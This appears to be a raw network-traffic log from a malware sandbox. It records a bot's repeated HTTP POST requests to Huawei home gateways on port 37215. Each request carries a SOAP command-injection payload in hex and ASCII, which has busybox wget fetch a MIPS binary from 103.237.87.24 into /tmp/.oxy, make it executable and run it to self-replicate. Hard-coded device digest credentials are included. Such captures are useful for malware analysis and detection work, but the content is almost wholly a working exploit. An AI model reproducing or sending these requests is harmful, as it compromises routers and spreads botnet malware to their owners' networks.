6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1100192.168.2.1358880197.68.156.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433459997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1101192.168.2.1352860149.46.93.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433463097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1102192.168.2.1351286197.134.206.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433470964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1103192.168.2.133777841.238.15.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433494091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1104192.168.2.133656842.10.7.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433501005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1105192.168.2.135563241.231.141.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433518887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1106192.168.2.1360514157.34.98.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433526993 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1107192.168.2.1349052197.252.156.22737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433568954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1108192.168.2.134078641.22.149.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433573961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1109192.168.2.133857279.174.224.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433599949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1110192.168.2.135259441.189.76.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.433605909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
